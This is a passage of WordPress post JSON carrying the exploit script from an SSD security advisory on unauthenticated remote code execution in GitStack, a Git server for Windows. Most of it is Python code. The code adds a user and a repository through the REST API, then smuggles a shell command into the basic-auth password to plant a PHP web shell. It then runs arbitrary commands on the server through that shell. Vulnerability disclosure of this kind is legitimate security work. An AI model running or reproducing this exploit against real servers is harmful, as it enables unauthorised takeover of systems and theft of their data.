class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User already exist&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-33\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot create user&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-34\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-36\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-37\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-38\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Web repository already enabled&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-39\"><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-40\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Enable web repository&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-41\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;{&#8220;enabled&#8221; : &#8220;true&#8221;}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-42\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;r: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-43\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Web interface successfully enabled&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-44\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot enable web interface&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-45\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-47\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Get repositories list&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-48\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-49\"><span class=\"crayon-v\">repository_list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-51\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">repository_list<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-52\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository_list<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-53\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Found repository {}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-54\"><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-55\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Create repository&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-58\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;csrftoken&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf_token<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;name&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;csrfmiddlewaretoken&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf_token<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-59\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;The repository has been successfully created&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Repository already exist&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-60\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot create repository&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-61\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-63\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Add user to repository&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-64\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-66\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;added to&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;has already&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-67\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot add user to repository&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-68\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-70\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Disable access for anyone&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-71\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">delete<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;everyone&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-73\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;everyone removed from rce&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;not in list&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-74\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot remove access for anyone&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-75\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-76\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-77\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Create backdoor in PHP&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-78\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/{}\/web\/index.php?p={}.git&amp;a=summary&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">HTTPBasicAuth<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;p &amp;&amp; echo &#8220;<span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;a&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span>&#8221; &gt; c:GitStackgitphpexploit.php&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-79\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stdout<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">encoding<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">errors<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;replace&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-81\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Execute command&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-82\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/web\/exploit.php&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;a&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-83\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stdout<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">encoding<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">errors<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;replace&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0181 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3557\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-300x194.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 15 Jan 2018 12:22:25 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack and then used to trigger an unauthenticated remote code execution. GitStack is &#8220;a software that lets you setup your own private Git server for Windows. This means that you create a leading edge versioning system &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3557\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 GitStack Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757,12136,17050],"class_list":["post-11120","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure","tag-unauthenticated-action","tag-unauthorized-access"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11120"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11120\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11120"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}